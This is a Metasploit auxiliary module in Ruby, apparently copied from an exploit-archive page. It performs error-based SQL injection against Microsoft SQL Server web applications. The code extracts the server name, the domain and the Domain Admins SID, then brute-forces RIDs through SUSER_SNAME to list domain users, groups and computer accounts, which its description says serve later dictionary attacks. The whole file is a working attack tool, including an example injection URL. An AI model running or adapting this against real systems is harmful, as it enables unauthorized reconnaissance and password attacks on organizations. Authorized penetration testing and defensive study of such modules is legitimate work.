## https://sploitus.com/exploit?id=PACKETSTORM:180794
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration',
'Description' => %q{
This module can be used to bruteforce RIDs associated with the domain of the SQL Server
using the SUSER_SNAME function via Error Based SQL injection. This is similar to the
smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC
role (everyone). Information that can be enumerated includes Windows domain users, groups,
and computer accounts. Enumerated accounts can then be used in online dictionary attacks.
The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
},
'Author' =>
[
'nullbind <scott.sutherland[at]netspi.com>',
'antti <antti.rantasaari[at]netspi.com>'
],
'License' => MSF_LICENSE,
'References' => [[ 'URL','https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql']]
))
register_options(
[
OptInt.new('START_RID', [true, 'RID to start fuzzing at.', 500]),
OptInt.new('END_RID', [true, 'RID to stop fuzzing at.', 3000])
])
end
def run
print_status("Grabbing the SQL Server name and domain...")
db_server_name = get_server_name
if db_server_name.nil?
print_error("Unable to grab the server name")
return
else
print_good("Server name: #{db_server_name}")
end
db_domain_name = get_domain_name
if db_domain_name.nil?
print_error("Unable to grab domain name")
return
end
# Check if server is on a domain
if db_server_name == db_domain_name
print_error("The SQL Server does not appear to be part of a Windows domain")
return
else
print_good("Domain name: #{db_domain_name}")
end
print_status("Grabbing the SID for the domain...")
windows_domain_sid = get_windows_domain_sid(db_domain_name)
if windows_domain_sid.nil?
print_error("Could not recover the SQL Server's domain sid.")
return
else
print_good("Domain sid: #{windows_domain_sid}")
end
# Get a list of windows users, groups, and computer accounts using SUSER_NAME()
total_rids = datastore['END_RID'] - datastore['START_RID']
print_status("Brute forcing #{total_rids} RIDs via SQL injection, be patient...")
domain_users = get_win_domain_users(windows_domain_sid)
if domain_users.nil?
print_error("Sorry, no Windows domain accounts were found, or DC could not be contacted.")
return
end
# Print number of objects found and write to a file
print_good("#{domain_users.length} user accounts, groups, and computer accounts were found.")
# Create table for report
windows_domain_login_table = Rex::Text::Table.new(
'Header' => 'Windows Domain Accounts',
'Ident' => 1,
'Columns' => ['name']
)
# Add brute forced names to table
domain_users.each do |object_name|
windows_domain_login_table << [object_name]
end
print_line(windows_domain_login_table.to_s)
# Create output file
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv"
path = store_loot(
'mssql.domain.accounts',
'text/plain',
datastore['RHOST'],
windows_domain_login_table.to_csv,
filename,
'SQL Server query results'
)
print_status("Query results have been saved to: #{path}")
end
# Get the server name
def get_server_name
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
instance_name = $1
sql_server_name = instance_name.split('\\')[0]
else
sql_server_name = nil
end
sql_server_name
end
# Get the domain name of the SQL Server
def get_domain_name
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
domain_name = $1
else
domain_name = nil
end
domain_name
end
# Get the SID for the domain
def get_windows_domain_sid(db_domain_name)
domain_group = "#{db_domain_name}\\Domain Admins"
clue_start = Rex::Text.rand_text_alpha(8)
clue_end = Rex::Text.rand_text_alpha(8)
sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
object_sid = $1
domain_sid = object_sid[0..47]
return nil if domain_sid.empty?
else
domain_sid = nil
end
domain_sid
end
# Get list of windows accounts, groups and computer accounts
def get_win_domain_users(domain_sid)
clue_start = Rex::Text.rand_text_alpha(8)
clue_end = Rex::Text.rand_text_alpha(8)
windows_logins = []
total_rids = datastore['END_RID'] - datastore['START_RID']
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
(datastore['START_RID']..datastore['END_RID']).each do |principal_id|
rid_diff = principal_id - datastore['START_RID']
if principal_id % 100 == 0
print_status("#{rid_diff} of #{total_rids } RID queries complete")
end
user_sid = build_user_sid(domain_sid, principal_id)
# Return if sid does not resolve correctly for a domain
if user_sid.length < 48
return nil
end
sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{user_sid}) as name)+'#{clue_end}')"
result = mssql_query(sql)
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
windows_login = $1
unless windows_login.empty? || windows_logins.include?(windows_login)
windows_logins.push(windows_login)
print_good(" #{windows_login}")
end
end
end
windows_logins
end
def build_user_sid(domain_sid, rid)
# Convert number to hex and fix order
principal_id = "%02X" % rid
principal_id = principal_id.size.even? ? principal_id : "0#{principal_id}"
principal_id = principal_id.scan(/(..)/).reverse.join
# Add padding
principal_id = principal_id.ljust(8, '0')
# Create full sid
"0x#{domain_sid}#{principal_id}"
end
end